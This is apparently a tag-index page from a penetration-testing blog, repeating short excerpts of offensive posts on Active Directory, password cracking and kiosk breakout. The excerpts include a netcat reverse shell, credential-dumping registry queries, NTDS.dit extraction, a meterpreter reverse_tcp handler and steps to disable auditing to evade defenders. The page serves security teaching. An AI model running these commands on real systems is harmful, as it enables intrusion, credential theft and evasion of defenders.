Internal Infrastructure Pentest - Kerberoasting
- Firstly purge all the tickets - klist purge - klist - SPN scan for service accounts - setspn -T domain_name -F -Q */* - Now request Service...
Posts by Tag
- Active Directory Hacking 19
- Windows Security 18
- ATM pentesting 4
- ATM hacking 4
- Kiosk Hacking 4
- Password Cracking 4
- Registry Key Hacking 3
- TIP 3
- SOAR 3
- Hardware 2
- Dropbox 2
- LLMNR 2
- Password 2
- Hash Cracking 2
- Kali 2
- LOTL 2
- EDR 2
- Living Off The Land 2
- Offensive Security 2
- Windows Services 1
- Security Policies 1
- Cheatsheet 1
- Windows commands 1
- Null Session 1
- PsExec 1
- Remote PsExec 1
- NTDS 1
- DIT file extraction 1
- DumpSec 1
- DACL 1
- SACL 1
- Cracking 1
- Hash 1
- Hashcat 1
- Password Spraying 1
- Spraying 1
- Intial Foothold 1
- Mimikatz 1
- Passwords 1
- Foothold 1
- Skeleton Key Attack 1
- RDP 1
- Remote Desktop 1
- Netcat 1
- Citrix Breakout 1
- Citrix 1
- Hydra 1
- Password Bruteforcing 1
- Tools 1
- Repos 1
- Internal Pentest Tools 1
- Kerberoasting 1
- Kerberos 1
- Nessus 1
- Nmap 1
- Ping Sweep 1
- Procdump 1
- Sysinternals 1
- Responder 1
- SMB 1
- MiTM 1
- UAC 1
- UAC Bypass 1
- HDD Hack 1
- Boot unencrypted HDD 1
- User Management 1
- msfvenom 1
- metasploit 1
- Metasploit 1
- GPP 1
- SOCKS 1
- SOCKS Tunnel 1
- SOCKS Proxy 1
- AppSec 1
- HTML2PDF 1
- 2G -GSM Hacking 1
- 4G - LTE Hacking 1
- Internal Pentest 1
- USB 1
- Recovery 1
- Forensics 1
- IOCs 1
- Ransomware 1
- Malware 1
- CVE-2020-15227 1
- RCE 1
- PHP 1
- Hacking tool 1
- DevOps 1
- Security Automation 1
- DevSecOps 1
- AV Bypass 1
- In Memory Execution 1
- Nuking Tools 1
Active Directory Hacking
Internal Infrastructure Pentest - Repos For Internal Pentest
Impacket: Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to...
Internal Infrastructure Pentest - Hydra
root@kali:~# hydra -t 1 -l admin -P /root/Desktop/password.lst -vV ftp </pre>
Internal Infrastructure Pentest - Netcat
Setup a listener: nc -lvp 4444 Connect using netcat reverse shell: nc -e /bin/sh 4444
Internal Infrastructure Pentest - Enable RDP and Remote Assistance on A Remote Machine
reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f reg add "hklm\system\currentControlSet\Contro...
Internal Infrastructure Pentest - Extracting Juicy Information from Registry
reg query “HKCU\Software\ORL\WinVNC3\Password” reg query HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password reg query “HKCU\Software\SimonTatham\...
Internal Infrastructure Pentest - Skeleton Key Attack
Skeleton Key Attack: This attack is very tricky. It makes the secondary password for the same user. Many malware takes advantage of this attack to create ...
Internal Infrastructure Pentest - Mimikatz
Mimikatz: mimikatz is a tool gentilkiwi made to learn C and make somes experiments with Windows security. It’s now well known to extract plaintexts passwords...
Internal Infrastructure Pentest - Password Spraying With CMD
Password Spraying: It is a technique of trying one password across all the domain users. - No tool needed. One can perform password spraing using cmd.ex...
Internal Infrastructure Pentest - Hashcat Password Cracking
Hashcat hashcat64.bin -a 0 -m 5600 hashes dict.txt -o output.pot
Internal Infrastructure Pentest - LLMNR
LLMNR (Link Local Multicast Name Rsolution): The Link-Local Multicast Name Resolution (LLMNR) is a protocol based on the Domain Name System (DNS) packet f...
Internal Infrastructure Pentest - DumpSec
Dumpsec: DumpSec is a security auditing program for Microsoft Windows. It dumps the permissions (DACLs) and audit settings (SACLs) for the file system, re...
Internal Infrastructure Pentest - Extracting NTDS.DIT File
Clear text proxy credentials of putty: reg query “HKCU\Software\SimonTatham\PuTTY\Sessions” This lists out all available sessions with pu...
Internal Infrastructure Pentest - Extracting NTDS.DIT File
Method1: ntdsutil snapshot "activate instance ntds" create quit quit ntdsutil snapshot "mount {GUID}" quit quit copy "MOUNT_POINT\windows\ntds\ntds.dit" "c:...
Internal Infrastructure Pentest - Remote PsExec
- reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f - PsExec64.exe \\172.20.10.8 -...
Internal Infrastructure Pentest - Null Session
Active Reconnaissance Methods: Null Session: net use \[DA IP Address]\ipc$ “” “/user:” here we’re trying to connec...
Internal Infrastructure Pentest - List of Commands
Commands for Initial Investigation tasklist TASKLIST TASKLIST /M TASKLIST /V /FO CSV TASKLIST /SVC /FO LIST TASKLIST ...
Internal Infrastructure Pentest - Disable Security Policies and Services
Disable security policies and services to avoid detection by Blue team Auditpol /set /Category:System /failure:disable Services.msc: ...
Windows Security
Internal Infrastructure Pentest - Kerberoasting
- Firstly purge all the tickets - klist purge - klist - SPN scan for service accounts - setspn -T domain_name -F -Q */* - Now request Service...
Internal Infrastructure Pentest - Repos For Internal Pentest
Impacket: Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to...
Internal Infrastructure Pentest - Hydra
root@kali:~# hydra -t 1 -l admin -P /root/Desktop/password.lst -vV ftp </pre>
Internal Infrastructure Pentest - Netcat
Setup a listener: nc -lvp 4444 Connect using netcat reverse shell: nc -e /bin/sh 4444
Internal Infrastructure Pentest - Enable RDP and Remote Assistance on A Remote Machine
reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f reg add "hklm\system\currentControlSet\Contro...
Internal Infrastructure Pentest - Extracting Juicy Information from Registry
reg query “HKCU\Software\ORL\WinVNC3\Password” reg query HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password reg query “HKCU\Software\SimonTatham\...
Internal Infrastructure Pentest - Skeleton Key Attack
Skeleton Key Attack: This attack is very tricky. It makes the secondary password for the same user. Many malware takes advantage of this attack to create ...
Internal Infrastructure Pentest - Mimikatz
Mimikatz: mimikatz is a tool gentilkiwi made to learn C and make somes experiments with Windows security. It’s now well known to extract plaintexts passwords...
Internal Infrastructure Pentest - Password Spraying With CMD
Password Spraying: It is a technique of trying one password across all the domain users. - No tool needed. One can perform password spraing using cmd.ex...
Internal Infrastructure Pentest - Hashcat Password Cracking
Hashcat hashcat64.bin -a 0 -m 5600 hashes dict.txt -o output.pot
Internal Infrastructure Pentest - LLMNR
LLMNR (Link Local Multicast Name Rsolution): The Link-Local Multicast Name Resolution (LLMNR) is a protocol based on the Domain Name System (DNS) packet f...
Internal Infrastructure Pentest - DumpSec
Dumpsec: DumpSec is a security auditing program for Microsoft Windows. It dumps the permissions (DACLs) and audit settings (SACLs) for the file system, re...
Internal Infrastructure Pentest - Extracting NTDS.DIT File
Clear text proxy credentials of putty: reg query “HKCU\Software\SimonTatham\PuTTY\Sessions” This lists out all available sessions with pu...
Internal Infrastructure Pentest - Extracting NTDS.DIT File
Method1: ntdsutil snapshot "activate instance ntds" create quit quit ntdsutil snapshot "mount {GUID}" quit quit copy "MOUNT_POINT\windows\ntds\ntds.dit" "c:...
Internal Infrastructure Pentest - Remote PsExec
- reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f - PsExec64.exe \\172.20.10.8 -...
Internal Infrastructure Pentest - List of Commands
Commands for Initial Investigation tasklist TASKLIST TASKLIST /M TASKLIST /V /FO CSV TASKLIST /SVC /FO LIST TASKLIST ...
Internal Infrastructure Pentest - Disable Security Policies and Services
Disable security policies and services to avoid detection by Blue team Auditpol /set /Category:System /failure:disable Services.msc: ...
ATM pentesting
ATM/Kiosk Machine Hacking - Shortcuts to Breakout of the Screen
ALT+F4: Quit program ALT+SPACE: System Menu ALT+TAB: Switch between open programs CTRL+ALT+DEL: Task Manager or Windows Security Screen CTRL+B: Op...
ATM/Kiosk Machine Hacking - Folder Path Alternatives
%USERPROFILE% %PROGRAMDATA% %PUBLIC% %TMP% %WINDIR% %SYSTEMDRIVE% %SYSTEMROOT%
ATM/Kiosk Machine Hacking - Captive Portal Breakout
Visit http://ikat.ha.cked.net/ from the Browser
ATM/Kiosk Machine Hacking - Shell Protocols
shell:::{20D04FE0-3AEA-1069-A2D8-08002B30309D}::{24ad3ad4-a569-4530-98e1-ab02f9417aa8} Shell:Profile Shell:ProgramFiles Shell:System Shell:Control...
ATM hacking
ATM/Kiosk Machine Hacking - Shortcuts to Breakout of the Screen
ALT+F4: Quit program ALT+SPACE: System Menu ALT+TAB: Switch between open programs CTRL+ALT+DEL: Task Manager or Windows Security Screen CTRL+B: Op...
ATM/Kiosk Machine Hacking - Folder Path Alternatives
%USERPROFILE% %PROGRAMDATA% %PUBLIC% %TMP% %WINDIR% %SYSTEMDRIVE% %SYSTEMROOT%
ATM/Kiosk Machine Hacking - Captive Portal Breakout
Visit http://ikat.ha.cked.net/ from the Browser
ATM/Kiosk Machine Hacking - Shell Protocols
shell:::{20D04FE0-3AEA-1069-A2D8-08002B30309D}::{24ad3ad4-a569-4530-98e1-ab02f9417aa8} Shell:Profile Shell:ProgramFiles Shell:System Shell:Control...
Kiosk Hacking
ATM/Kiosk Machine Hacking - Shortcuts to Breakout of the Screen
ALT+F4: Quit program ALT+SPACE: System Menu ALT+TAB: Switch between open programs CTRL+ALT+DEL: Task Manager or Windows Security Screen CTRL+B: Op...
ATM/Kiosk Machine Hacking - Folder Path Alternatives
%USERPROFILE% %PROGRAMDATA% %PUBLIC% %TMP% %WINDIR% %SYSTEMDRIVE% %SYSTEMROOT%
ATM/Kiosk Machine Hacking - Captive Portal Breakout
Visit http://ikat.ha.cked.net/ from the Browser
ATM/Kiosk Machine Hacking - Shell Protocols
shell:::{20D04FE0-3AEA-1069-A2D8-08002B30309D}::{24ad3ad4-a569-4530-98e1-ab02f9417aa8} Shell:Profile Shell:ProgramFiles Shell:System Shell:Control...
Password Cracking
Internal Infrastructure Pentest - Hydra
root@kali:~# hydra -t 1 -l admin -P /root/Desktop/password.lst -vV ftp </pre>
Internal Infrastructure Pentest - Mimikatz
Mimikatz: mimikatz is a tool gentilkiwi made to learn C and make somes experiments with Windows security. It’s now well known to extract plaintexts passwords...
Internal Infrastructure Pentest - Mimikatz
Mimikatz: mimikatz is a tool gentilkiwi made to learn C and make somes experiments with Windows security. It’s now well known to extract plaintexts passwords...
Internal Infrastructure Pentest - Hashcat Password Cracking
Hashcat hashcat64.bin -a 0 -m 5600 hashes dict.txt -o output.pot
Registry Key Hacking
Internal Infrastructure Pentest - Enable RDP and Remote Assistance on A Remote Machine
reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f reg add "hklm\system\currentControlSet\Contro...
Internal Infrastructure Pentest - Extracting Juicy Information from Registry
reg query “HKCU\Software\ORL\WinVNC3\Password” reg query HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password reg query “HKCU\Software\SimonTatham\...
Internal Infrastructure Pentest - Extracting NTDS.DIT File
Clear text proxy credentials of putty: reg query “HKCU\Software\SimonTatham\PuTTY\Sessions” This lists out all available sessions with pu...
TIP
Brace Yourself: Cyber Attacks on Australian Businesses Set to Skyrocket
Brace Yourself: Cyber Attacks on Australian Businesses Set to Skyrocket
Threat Investigation Canvas
Over the last few days, I observed targeted campaigns against Microsoft brand. With multiple feed sources, found 447 unique malicious domains.
SOAR
Brace Yourself: Cyber Attacks on Australian Businesses Set to Skyrocket
Brace Yourself: Cyber Attacks on Australian Businesses Set to Skyrocket
Threat Investigation Canvas
Over the last few days, I observed targeted campaigns against Microsoft brand. With multiple feed sources, found 447 unique malicious domains.
Hardware
Hardware Hacking - Dropbox for Pentesting
Command & Control Server:
Hardware Hacking - Information Gathering
https://www.fcc.gov/oet/ea/fccid
Dropbox
Hardware Hacking - Dropbox for Pentesting
Command & Control Server:
Hardware Hacking - Information Gathering
https://www.fcc.gov/oet/ea/fccid
LLMNR
Internal Infrastructure Pentest - Responder
Responder.py -i local-ip -I interface
Internal Infrastructure Pentest - LLMNR
LLMNR (Link Local Multicast Name Rsolution): The Link-Local Multicast Name Resolution (LLMNR) is a protocol based on the Domain Name System (DNS) packet f...
Password
Internal Infrastructure Pentest - Password Spraying With CMD
Password Spraying: It is a technique of trying one password across all the domain users. - No tool needed. One can perform password spraing using cmd.ex...
Internal Infrastructure Pentest - Hashcat Password Cracking
Hashcat hashcat64.bin -a 0 -m 5600 hashes dict.txt -o output.pot
Hash Cracking
Internal Infrastructure Pentest - Password Spraying With CMD
Password Spraying: It is a technique of trying one password across all the domain users. - No tool needed. One can perform password spraing using cmd.ex...
Internal Infrastructure Pentest - Hashcat Password Cracking
Hashcat hashcat64.bin -a 0 -m 5600 hashes dict.txt -o output.pot
Kali
Installing Kali in AWS EC2 Instance
sudo passwd kali sudo apt-get update sudo apt-get install xrdp lxde-core lxde tigervnc-standalone-server -y cd / sudo sed -i ‘s/allowed_users=.*/a...
Internal Infrastructure Pentest - User Management Kali
adduser user1 passwd user1 type new password: xxxxxxxxxxxxxxx type confirm password: xxxxxxxxxxxx Adding user to the sudoers ...
LOTL
HiveJack
HiveJack This tool can be used during internal penetration testing to dump Windows credentials from an already-compromised host. It allows one to dump SYSTEM...
Living Off The Land Binaries - AT Command
Examples of at.exe being used maliciously in order to establish persistence in a manner almost identical to schtasks use as a lolbin (enter hashes into viru...
EDR
HiveJack
HiveJack This tool can be used during internal penetration testing to dump Windows credentials from an already-compromised host. It allows one to dump SYSTEM...
Living Off The Land Binaries - AT Command
Examples of at.exe being used maliciously in order to establish persistence in a manner almost identical to schtasks use as a lolbin (enter hashes into viru...
Living Off The Land
HiveJack
HiveJack This tool can be used during internal penetration testing to dump Windows credentials from an already-compromised host. It allows one to dump SYSTEM...
Living Off The Land Binaries - AT Command
Examples of at.exe being used maliciously in order to establish persistence in a manner almost identical to schtasks use as a lolbin (enter hashes into viru...
Offensive Security
Destroying Cloud Infrastructure with Nuking Tools
Cloud computing has become the backbone of countless businesses, ensuring the security of cloud infrastructure is of utmost importance. Misconfigurations, un...
Installing Kali in AWS EC2 Instance
sudo passwd kali sudo apt-get update sudo apt-get install xrdp lxde-core lxde tigervnc-standalone-server -y cd / sudo sed -i ‘s/allowed_users=.*/a...
Windows Services
Internal Infrastructure Pentest - Disable Security Policies and Services
Disable security policies and services to avoid detection by Blue team Auditpol /set /Category:System /failure:disable Services.msc: ...
Security Policies
Internal Infrastructure Pentest - Disable Security Policies and Services
Disable security policies and services to avoid detection by Blue team Auditpol /set /Category:System /failure:disable Services.msc: ...
Cheatsheet
Internal Infrastructure Pentest - List of Commands
Commands for Initial Investigation tasklist TASKLIST TASKLIST /M TASKLIST /V /FO CSV TASKLIST /SVC /FO LIST TASKLIST ...
Windows commands
Internal Infrastructure Pentest - List of Commands
Commands for Initial Investigation tasklist TASKLIST TASKLIST /M TASKLIST /V /FO CSV TASKLIST /SVC /FO LIST TASKLIST ...
Null Session
Internal Infrastructure Pentest - Null Session
Active Reconnaissance Methods: Null Session: net use \[DA IP Address]\ipc$ “” “/user:” here we’re trying to connec...
PsExec
Internal Infrastructure Pentest - Remote PsExec
- reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f - PsExec64.exe \\172.20.10.8 -...
Remote PsExec
Internal Infrastructure Pentest - Remote PsExec
- reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f - PsExec64.exe \\172.20.10.8 -...
NTDS
Internal Infrastructure Pentest - Extracting NTDS.DIT File
Method1: ntdsutil snapshot "activate instance ntds" create quit quit ntdsutil snapshot "mount {GUID}" quit quit copy "MOUNT_POINT\windows\ntds\ntds.dit" "c:...
DIT file extraction
Internal Infrastructure Pentest - Extracting NTDS.DIT File
Method1: ntdsutil snapshot "activate instance ntds" create quit quit ntdsutil snapshot "mount {GUID}" quit quit copy "MOUNT_POINT\windows\ntds\ntds.dit" "c:...
DumpSec
Internal Infrastructure Pentest - DumpSec
Dumpsec: DumpSec is a security auditing program for Microsoft Windows. It dumps the permissions (DACLs) and audit settings (SACLs) for the file system, re...
DACL
Internal Infrastructure Pentest - DumpSec
Dumpsec: DumpSec is a security auditing program for Microsoft Windows. It dumps the permissions (DACLs) and audit settings (SACLs) for the file system, re...
SACL
Internal Infrastructure Pentest - DumpSec
Dumpsec: DumpSec is a security auditing program for Microsoft Windows. It dumps the permissions (DACLs) and audit settings (SACLs) for the file system, re...
Cracking
Internal Infrastructure Pentest - Hashcat Password Cracking
Hashcat hashcat64.bin -a 0 -m 5600 hashes dict.txt -o output.pot
Hash
Internal Infrastructure Pentest - Hashcat Password Cracking
Hashcat hashcat64.bin -a 0 -m 5600 hashes dict.txt -o output.pot
Hashcat
Internal Infrastructure Pentest - Hashcat Password Cracking
Hashcat hashcat64.bin -a 0 -m 5600 hashes dict.txt -o output.pot
Password Spraying
Internal Infrastructure Pentest - Password Spraying With CMD
Password Spraying: It is a technique of trying one password across all the domain users. - No tool needed. One can perform password spraing using cmd.ex...
Spraying
Internal Infrastructure Pentest - Password Spraying With CMD
Password Spraying: It is a technique of trying one password across all the domain users. - No tool needed. One can perform password spraing using cmd.ex...
Intial Foothold
Internal Infrastructure Pentest - Password Spraying With CMD
Password Spraying: It is a technique of trying one password across all the domain users. - No tool needed. One can perform password spraing using cmd.ex...
Mimikatz
Internal Infrastructure Pentest - Mimikatz
Mimikatz: mimikatz is a tool gentilkiwi made to learn C and make somes experiments with Windows security. It’s now well known to extract plaintexts passwords...
Passwords
Internal Infrastructure Pentest - Mimikatz
Mimikatz: mimikatz is a tool gentilkiwi made to learn C and make somes experiments with Windows security. It’s now well known to extract plaintexts passwords...
Foothold
Internal Infrastructure Pentest - Mimikatz
Mimikatz: mimikatz is a tool gentilkiwi made to learn C and make somes experiments with Windows security. It’s now well known to extract plaintexts passwords...
Skeleton Key Attack
Internal Infrastructure Pentest - Skeleton Key Attack
Skeleton Key Attack: This attack is very tricky. It makes the secondary password for the same user. Many malware takes advantage of this attack to create ...
RDP
Internal Infrastructure Pentest - Enable RDP and Remote Assistance on A Remote Machine
reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f reg add "hklm\system\currentControlSet\Contro...
Remote Desktop
Internal Infrastructure Pentest - Enable RDP and Remote Assistance on A Remote Machine
reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f reg add "hklm\system\currentControlSet\Contro...
Netcat
Internal Infrastructure Pentest - Netcat
Setup a listener: nc -lvp 4444 Connect using netcat reverse shell: nc -e /bin/sh 4444
Citrix Breakout
Back to top ↑Citrix
Back to top ↑Hydra
Internal Infrastructure Pentest - Hydra
root@kali:~# hydra -t 1 -l admin -P /root/Desktop/password.lst -vV ftp </pre>
Password Bruteforcing
Internal Infrastructure Pentest - Hydra
root@kali:~# hydra -t 1 -l admin -P /root/Desktop/password.lst -vV ftp </pre>
Tools
Internal Infrastructure Pentest - Repos For Internal Pentest
Impacket: Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to...
Repos
Internal Infrastructure Pentest - Repos For Internal Pentest
Impacket: Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to...
Internal Pentest Tools
Internal Infrastructure Pentest - Repos For Internal Pentest
Impacket: Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to...
Kerberoasting
Internal Infrastructure Pentest - Kerberoasting
- Firstly purge all the tickets - klist purge - klist - SPN scan for service accounts - setspn -T domain_name -F -Q */* - Now request Service...
Kerberos
Internal Infrastructure Pentest - Kerberoasting
- Firstly purge all the tickets - klist purge - klist - SPN scan for service accounts - setspn -T domain_name -F -Q */* - Now request Service...
Nessus
Internal Infrastructure Pentest - Nessus Installation
- sudo wget http://downloads.nessus.org/nessus3dl.php?file=Nessus-6.11.1-debian6_amd64.deb - sudo dpkg -i Nessus-6.11.1-debian6_amd64.deb - Incase you hav...
Nmap
Internal Infrastructure Pentest - Nmap Ping Sweep
Ping sweep is the process of pinging an entire range of network ip addresses to find out which ones are online or alive. Nmap is an excellent tool to do t...
Ping Sweep
Internal Infrastructure Pentest - Nmap Ping Sweep
Ping sweep is the process of pinging an entire range of network ip addresses to find out which ones are online or alive. Nmap is an excellent tool to do t...
Procdump
Internal Infrastructure Pentest - Procdump
Download Procdump: https://technet.microsoft.com/en-us/sysinternals/dd996900.aspx
Sysinternals
Internal Infrastructure Pentest - Procdump
Download Procdump: https://technet.microsoft.com/en-us/sysinternals/dd996900.aspx
Responder
Internal Infrastructure Pentest - Responder
Responder.py -i local-ip -I interface
SMB
Internal Infrastructure Pentest - Responder
Responder.py -i local-ip -I interface
MiTM
Internal Infrastructure Pentest - Responder
Responder.py -i local-ip -I interface
UAC
Internal Infrastructure Pentest - UAC Bypass
• Windows 7 UAC whitelist, http://www.pretentiousname.com/misc/win7_uac_whitelist2.html • Malicious Application Compatibility Shims, https://www.blackhat.co...
UAC Bypass
Internal Infrastructure Pentest - UAC Bypass
• Windows 7 UAC whitelist, http://www.pretentiousname.com/misc/win7_uac_whitelist2.html • Malicious Application Compatibility Shims, https://www.blackhat.co...
HDD Hack
Internal Infrastructure Pentest - Unencrypted HDD Boot
- Boot the machine with Kali - fdisk -l - look for (HPFS/NTFS/exFat) in the Type column of the about command - mkdir /mnt/nts - mount -t -ntfs-3g /dev/sda1 ...
Boot unencrypted HDD
Internal Infrastructure Pentest - Unencrypted HDD Boot
- Boot the machine with Kali - fdisk -l - look for (HPFS/NTFS/exFat) in the Type column of the about command - mkdir /mnt/nts - mount -t -ntfs-3g /dev/sda1 ...
User Management
Internal Infrastructure Pentest - User Management Kali
adduser user1 passwd user1 type new password: xxxxxxxxxxxxxxx type confirm password: xxxxxxxxxxxx Adding user to the sudoers ...
msfvenom
Internal Infrastructure Pentest - msfvenom
Handler on Msfconsole - use exploit/multi/handler - set PAYLOAD windows/meterpreter/reverse_tcp - set LHOST localhost - set LPORT 4444 - set Exi...
metasploit
Internal Infrastructure Pentest - msfvenom
Handler on Msfconsole - use exploit/multi/handler - set PAYLOAD windows/meterpreter/reverse_tcp - set LHOST localhost - set LPORT 4444 - set Exi...
Metasploit
Internal Infrastructure Pentest - metasploit gpp
msf > use auxiliary/scanner/smb/smb_enum_gpp msf auxiliary(smb_enum_gpp) > set SMBUSER test SMBUSER => test msf auxiliary(smb_enum_gpp) > set S...
GPP
Internal Infrastructure Pentest - metasploit gpp
msf > use auxiliary/scanner/smb/smb_enum_gpp msf auxiliary(smb_enum_gpp) > set SMBUSER test SMBUSER => test msf auxiliary(smb_enum_gpp) > set S...
SOCKS
Internal Infrastructure Pentest - Socks Tunnel
SOCKS 5 proxy tunnel:
SOCKS Tunnel
Internal Infrastructure Pentest - Socks Tunnel
SOCKS 5 proxy tunnel:
SOCKS Proxy
Internal Infrastructure Pentest - Socks Tunnel
SOCKS 5 proxy tunnel:
AppSec
Web Application Pentest - HTML-to-PDF-Converter
Below are some of the vulnerability reports in the HTML to PDF converters or PDF parsers.
HTML2PDF
Web Application Pentest - HTML-to-PDF-Converter
Below are some of the vulnerability reports in the HTML to PDF converters or PDF parsers.
2G -GSM Hacking
IMSI Catcher
Thanks to Keld Norman
4G - LTE Hacking
IMSI Catcher
Thanks to Keld Norman
Internal Pentest
HiveJack
HiveJack This tool can be used during internal penetration testing to dump Windows credentials from an already-compromised host. It allows one to dump SYSTEM...
USB
Restore Lost Capacity Of Your USB Drives and SD Cards
I was playing with the Pi hole on one of my old Raspberry Pi and noticed that my 32 GB SanDisk Micro SD card was showing only 100 MB as space. I tried multip...
Recovery
Restore Lost Capacity Of Your USB Drives and SD Cards
I was playing with the Pi hole on one of my old Raspberry Pi and noticed that my 32 GB SanDisk Micro SD card was showing only 100 MB as space. I tried multip...
Forensics
Restore Lost Capacity Of Your USB Drives and SD Cards
I was playing with the Pi hole on one of my old Raspberry Pi and noticed that my 32 GB SanDisk Micro SD card was showing only 100 MB as space. I tried multip...
IOCs
Phirautee- Writing Ransomware using Living off the Land (LotL) Tactics
Phirautee A proof of concept crypto virus to spread user awareness about attacks and implications of ransomwares. Phirautee is written purely using PowerShel...
Ransomware
Phirautee- Writing Ransomware using Living off the Land (LotL) Tactics
Phirautee A proof of concept crypto virus to spread user awareness about attacks and implications of ransomwares. Phirautee is written purely using PowerShel...
Malware
Phirautee- Writing Ransomware using Living off the Land (LotL) Tactics
Phirautee A proof of concept crypto virus to spread user awareness about attacks and implications of ransomwares. Phirautee is written purely using PowerShel...
CVE-2020-15227
Nette Framework: CVE-2020-15227
Nette Framework: Nette Framework is an open-source framework for creating web applications in PHP 5 and 7. It supports AJAX, DRY, KISS, MVC and code reusabil...
RCE
Nette Framework: CVE-2020-15227
Nette Framework: Nette Framework is an open-source framework for creating web applications in PHP 5 and 7. It supports AJAX, DRY, KISS, MVC and code reusabil...
PHP
Nette Framework: CVE-2020-15227
Nette Framework: Nette Framework is an open-source framework for creating web applications in PHP 5 and 7. It supports AJAX, DRY, KISS, MVC and code reusabil...
Hacking tool
BigBountyRecon - Reconnaissance Tool
BigBountyRecon BigBountyRecon tool utilises 58 different techniques using various Google dorks and open source tools to expedite the process of initial recon...
DevOps
Understanding DevSecOps Security Test Pyramid
Happy New Year, readers!
Security Automation
Understanding DevSecOps Security Test Pyramid
Happy New Year, readers!
DevSecOps
Understanding DevSecOps Security Test Pyramid
Happy New Year, readers!
AV Bypass
The Power of In-Memory Executions: How to Execute Code without Touching Disk
In-memory execution is a technique used by malware developers to evade detection by traditional antivirus solutions. Instead of writing their malicious code ...
In Memory Execution
The Power of In-Memory Executions: How to Execute Code without Touching Disk
In-memory execution is a technique used by malware developers to evade detection by traditional antivirus solutions. Instead of writing their malicious code ...
Nuking Tools
Destroying Cloud Infrastructure with Nuking Tools
Cloud computing has become the backbone of countless businesses, ensuring the security of cloud infrastructure is of utmost importance. Misconfigurations, un...